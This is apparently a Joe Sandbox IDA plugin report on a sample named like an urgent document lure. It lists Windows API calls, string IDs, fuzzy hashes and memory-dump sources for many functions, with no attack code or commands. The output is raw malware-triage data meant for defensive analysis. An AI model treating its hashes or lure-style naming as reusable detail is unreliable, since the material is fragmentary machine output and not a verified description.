                                                        • Instruction ID: 60eff2204552638baa50968c5b1ec12482493ff8819337d84e8636a8f0030324
                                                        • Opcode Fuzzy Hash: b79f97b11a7d6962d372d0a4ccb284e4fc5bcf694c6e8e9d1ab55c8386d04fc1
                                                        • Instruction Fuzzy Hash: E1916D756043019FC710EF25C48499BB7E4EF89718F14896EF88A9B3A2DB34ED06CB56
                                                        APIs
                                                          • Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9
                                                        • _memset.LIBCMT ref: 00462B87
                                                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00462BB6
                                                        • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00462C69
                                                        • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00462C97
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                        • String ID: 0
                                                        • API String ID: 4152858687-4108050209
                                                        • Opcode ID: eb943b9b2bd9ab7df12d7fb8541c6f61320b84d3e63b72e46419b12da698adb2
                                                        • Instruction ID: 8d65d54c91bb2834d650baaa5c58db0a2d3f708132dab7008ae6ceb83fe6ffca
                                                        • Opcode Fuzzy Hash: eb943b9b2bd9ab7df12d7fb8541c6f61320b84d3e63b72e46419b12da698adb2
                                                        • Instruction Fuzzy Hash: BF51DD71208B01AED7249E28DA44A6F77E8EF44314F040A2FF880D7291EBB8DC44875B
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: _memmove$_free
                                                        • String ID: 3cA$_A
                                                        • API String ID: 2620147621-3480954128
                                                        • Opcode ID: cd52e68eb8994818202cc38379586957e4432314458df140b9a3ed5bd26668b5
                                                        • Instruction ID: 850dd104c1974142ce8a52b298ec70faaced32133f8a19a743ede36878807482
                                                        • Opcode Fuzzy Hash: cd52e68eb8994818202cc38379586957e4432314458df140b9a3ed5bd26668b5
                                                        • Instruction Fuzzy Hash: C7518C716043418FDB24CF29C840BABBBE1FF85304F49482EE98987351DB39E941CB4A
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: _memset$_memmove
                                                        • String ID: 3cA$ERCP
                                                        • API String ID: 2532777613-1471582817
                                                        • Opcode ID: f26897e622874a94d3a5be45ebb38ce857f1f7ed6e3ab2c2ed74d649e7167b68
                                                        • Instruction ID: eaf8e981165fb7e982de03985e75bf568e49202a02b644e32a28802e4b47c64a
                                                        • Opcode Fuzzy Hash: f26897e622874a94d3a5be45ebb38ce857f1f7ed6e3ab2c2ed74d649e7167b68
                                                        • Instruction Fuzzy Hash: 02518C71A00709DBDB24DF65C9817EBB7F4AF04304F2085AFE94A86241E778EA858B59
                                                        APIs
                                                        • _memset.LIBCMT ref: 004627C0
                                                        • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 004627DC
                                                        • DeleteMenu.USER32(?,00000007,00000000), ref: 00462822
                                                        • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,004C5890,00000000), ref: 0046286B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Menu$Delete$InfoItem_memset
                                                        • String ID: 0
                                                        • API String ID: 1173514356-4108050209
                                                        • Opcode ID: 0b59e6d123104e8f486f51701735be17c722a032adafe4466648fbe3018c70b5
                                                        • Instruction ID: 6162d5963bf1ca612739d8e457cf9df7481532cfa70a9704744149088ee17d1e
                                                        • Opcode Fuzzy Hash: 0b59e6d123104e8f486f51701735be17c722a032adafe4466648fbe3018c70b5
                                                        • Instruction Fuzzy Hash: F141AE70604701AFD720EF29CD44B1BBBE4AF84314F044A2EF96597391E7B8A905CB6B
                                                        APIs
                                                          • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                          • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                                                        • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00458F14
                                                        • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00458F27
                                                        • SendMessageW.USER32(?,00000189,?,00000000), ref: 00458F57
                                                          • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$_memmove$ClassName
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 365058703-1403004172
                                                        • Opcode ID: 37e78263d393d5b8ed0ad6ced2851d14854ed1b80b918288eea4e2fb559a05c4
                                                        • Instruction ID: 808fcc3072a567dbeea6ba3b2dea5d83030b8b2133ef71414da725dc7de09f99
                                                        • Opcode Fuzzy Hash: 37e78263d393d5b8ed0ad6ced2851d14854ed1b80b918288eea4e2fb559a05c4
                                                        • Instruction Fuzzy Hash: 1021F572A00108BEDB14ABA19C45DFF7769DF05324B10462FF825B72E2DE3D180E9A28
                                                        APIs
                                                          • Part of subcall function 00401D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00401D73
                                                          • Part of subcall function 00401D35: GetStockObject.GDI32(00000011), ref: 00401D87
                                                          • Part of subcall function 00401D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00401D91
                                                        • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00486461
                                                        • LoadLibraryW.KERNEL32(?), ref: 00486468
                                                        • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 0048647D
                                                        • DestroyWindow.USER32(?), ref: 00486485
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                        • String ID: SysAnimate32
                                                        • API String ID: 4146253029-1011021900
                                                        • Opcode ID: b969d8637368705cbd5fc3c3416812969f869cc3827cfeeeab454fcba1ebf117
                                                        • Instruction ID: 96a79e02294e314170444e54cb88eb83d8519b29eeb49143b64c907e724dd28e
                                                        • Opcode Fuzzy Hash: b969d8637368705cbd5fc3c3416812969f869cc3827cfeeeab454fcba1ebf117
                                                        • Instruction Fuzzy Hash: 2C219571110205BFEF506F64DC40EBF37ADEF54724F114A2AF91492190D739DC41A768
                                                        APIs
                                                        • GetStdHandle.KERNEL32(0000000C), ref: 00466DBC
                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00466DEF
                                                        • GetStdHandle.KERNEL32(0000000C), ref: 00466E01
                                                        • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00466E3B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: CreateHandle$FilePipe
                                                        • String ID: nul
                                                        • API String ID: 4209266947-2873401336
                                                        • Opcode ID: f98635b68cd5b0ab1880de70f3850fd061f65506a9295ae7d453fc561602cffb
                                                        • Instruction ID: cca2de9678abd998f0cd8c5114a45f7ff5fc269ace22cdb61a343b4aec1dc2fa
                                                        • Opcode Fuzzy Hash: f98635b68cd5b0ab1880de70f3850fd061f65506a9295ae7d453fc561602cffb
                                                        • Instruction Fuzzy Hash: 8B219274600209ABDB209F29DC05A9A77F8EF44720F214A2FFCA0D73D0EB759955CB5A
                                                        APIs
                                                        • GetStdHandle.KERNEL32(000000F6), ref: 00466E89
                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00466EBB
                                                        • GetStdHandle.KERNEL32(000000F6), ref: 00466ECC
                                                        • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00466F06
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: CreateHandle$FilePipe
                                                        • String ID: nul
                                                        • API String ID: 4209266947-2873401336
                                                        • Opcode ID: f710eb54d58d972596414a75e1bad7db44e4d7afab8e48cef3b5ff9c2d25cc6d
                                                        • Instruction ID: 3a9fffd2e99ff55030e4788a991c608e9c08d8bb738c80722c17144d2858802a
                                                        • Opcode Fuzzy Hash: f710eb54d58d972596414a75e1bad7db44e4d7afab8e48cef3b5ff9c2d25cc6d
                                                        • Instruction Fuzzy Hash: 7B21C7795003059BDB209F69CC04A9B77A8EF44724F210B1EFCA0D33D0E7759851C75A
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 0046AC54
                                                        • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0046ACA8
                                                        • __swprintf.LIBCMT ref: 0046ACC1
                                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000,0048F910), ref: 0046ACFF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$InformationVolume__swprintf
                                                        • String ID: %lu
                                                        • API String ID: 3164766367-685833217
                                                        • Opcode ID: 1226eaab5c3aec93efd893ba7ce645b68cb4b14e47f6f225cd052cc4731cbfea
                                                        • Instruction ID: 026ba00fef41ead7d753cb67677e2cef5533d5e87c35db631ff5a0b10e4673a5
                                                        • Opcode Fuzzy Hash: 1226eaab5c3aec93efd893ba7ce645b68cb4b14e47f6f225cd052cc4731cbfea
                                                        • Instruction Fuzzy Hash: FE217470600109AFCB10EF65C945DAE77B8EF49318B10447EF905AB252DA35EE55CB25
                                                        APIs
                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 0046115F
                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 00461184
                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 0046118E
                                                        • Sleep.KERNEL32(?,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 004611C1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: CounterPerformanceQuerySleep
                                                        • String ID: @F
                                                        • API String ID: 2875609808-2781531706
                                                        • Opcode ID: fb156e6c77600c7f304348c8d1eac85c626a95be7b30d4d71b6c442a0f0d2560
                                                        • Instruction ID: bb6757969e877831e55d7075b4886ee1e071d58b2ed1133263d880316bc49dff
                                                        • Opcode Fuzzy Hash: fb156e6c77600c7f304348c8d1eac85c626a95be7b30d4d71b6c442a0f0d2560
                                                        • Instruction Fuzzy Hash: B5113071D0051DD7CF00DFA5D9486EEBB78FF0E711F04446ADA41B2250DB789954CB9A
                                                        APIs
                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,016B3F73,00000003,?,016B3F13,00000003,016CDE80,0000000C,016B403D,00000003,00000002), ref: 016B3FE2
                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 016B3FF5
                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,016B3F73,00000003,?,016B3F13,00000003,016CDE80,0000000C,016B403D,00000003,00000002,00000000), ref: 016B4018
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1287711947.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1670000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                        • String ID: CorExitProcess$mscoree.dll
                                                        • API String ID: 4061214504-1276376045
                                                        • Opcode ID: 70c47f72444ad692a50132e6f1b508f96df573b11229cb108134ed482f1780d4
                                                        • Instruction ID: e5d506236ad54c5015edc0753f712363e1de5e3a2282726f3a76bb3b6e015ab8
                                                        • Opcode Fuzzy Hash: 70c47f72444ad692a50132e6f1b508f96df573b11229cb108134ed482f1780d4
                                                        • Instruction Fuzzy Hash: C5F0443090021CBBDB219FD5DC49BEDBFB9EB04655F000058F906A2245DF745A94CB90
                                                        APIs
                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047EC07
                                                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047EC37
                                                        • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0047ED6A
                                                        • CloseHandle.KERNEL32(?), ref: 0047EDEB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                        • String ID:
                                                        • API String ID: 2364364464-0
                                                        • Opcode ID: 0682de77952afe081ab9211739b9fa55dc0894d1ffd7185653a5878fd6647099
                                                        • Instruction ID: fffec5fe55f17e3d6af6322d033c5a61601868e7b6c72126a0bd4eac84abd099
                                                        • Opcode Fuzzy Hash: 0682de77952afe081ab9211739b9fa55dc0894d1ffd7185653a5878fd6647099
                                                        • Instruction Fuzzy Hash: F38191B16007009FD720EF29C846F6AB7E5AF48714F04C96EF999AB3D2D674AC44CB49
                                                        APIs
                                                          • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                          • Part of subcall function 00480E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31
                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004800FD
                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0048013C
                                                        • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00480183
                                                        • RegCloseKey.ADVAPI32(?,?), ref: 004801AF
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 004801BC
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                        • String ID:
                                                        • API String ID: 3440857362-0
                                                        • Opcode ID: 3bdeb89f84ddb2d76b562790cbf358911bbf2c76af4dc57bd1f5005be4229c28
                                                        • Instruction ID: 88ea7daa6ea56d794f8f44f15d5cebce8ee28ea1eb3ac59e56a3faba9080710b
                                                        • Opcode Fuzzy Hash: 3bdeb89f84ddb2d76b562790cbf358911bbf2c76af4dc57bd1f5005be4229c28
                                                        • Instruction Fuzzy Hash: 00517E71214204AFC704EF54C885E6FB7E8FF84318F40492EF595972A2DB39E909CB56
                                                        APIs
                                                        • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0046E61F
                                                        • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0046E648
                                                        • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0046E687
                                                          • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                          • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                        • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0046E6AC
                                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0046E6B4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                        • String ID:
                                                        • API String ID: 1389676194-0
                                                        • Opcode ID: de6c3d61c613d2cf68e58176d0c6a238a9722d9a5366df973ef3e66f8046f82b
                                                        • Instruction ID: 91bc9b0f2d422c2787d2346e32f4aa496c052f5f6ad9ddd010e4038a96899c27
                                                        • Opcode Fuzzy Hash: de6c3d61c613d2cf68e58176d0c6a238a9722d9a5366df973ef3e66f8046f82b
                                                        • Instruction Fuzzy Hash: 21514D75A00105DFCB01EF65C981AAEBBF5EF09314F1480AAE809AB3A2DB35ED11CF55
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 22afa8660c4250821daf86cd4b3c3329a23997c60e7bd91151dab5187926c109
                                                        • Instruction ID: 1d009f8157befd3e54c409f5ed609bf9f47d87f5e0fd5ad8ffda0b3aa488663e
                                                        • Opcode Fuzzy Hash: 22afa8660c4250821daf86cd4b3c3329a23997c60e7bd91151dab5187926c109
                                                        • Instruction Fuzzy Hash: A1419435904114ABE710FF24CC4CFAEBBA4EB09310F144A67E815A73E1C7B8AD65D75A
                                                        APIs
                                                        • GetCursorPos.USER32(?), ref: 00402357
                                                        • ScreenToClient.USER32(004C57B0,?), ref: 00402374
                                                        • GetAsyncKeyState.USER32(00000001), ref: 00402399
